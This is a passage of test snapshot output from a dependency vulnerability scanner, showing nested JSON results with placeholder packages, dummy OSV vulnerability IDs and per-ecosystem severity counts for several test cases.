[], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, 
"BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { 
"Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 6 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, 
"Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": 
null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "unknown:/path/to/my/third/lockfile", "Type": "unknown", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.3.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], 
"LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": 
"", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { 
"diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, 
"LicenseViolationsCount": 0 }, { "Name": "unknown:/path/to/my/third/lockfile", "Type": "unknown", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.3.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, 
"Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 3, "OS": 0, "Project": 3, "Hidden": 0 }, "PackageTypeCount": { "Regular": 3, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "NuGet", "Sources": [ { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { 
"diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "Packagist", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author1/mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { 
"AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author3/mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "MEDIUM", "SeverityScore": "4.3" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { 
"Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 1, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 1, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { 
"Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 1, "Low": 0, "Unknown": 5 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "Ecosystems": [ { "Name": "NuGet", "Sources": [ { "Name": 